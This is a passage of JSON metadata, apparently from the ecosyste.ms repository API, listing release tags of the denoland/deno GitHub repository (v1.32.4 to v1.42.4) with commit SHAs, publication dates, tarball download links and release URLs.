l":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.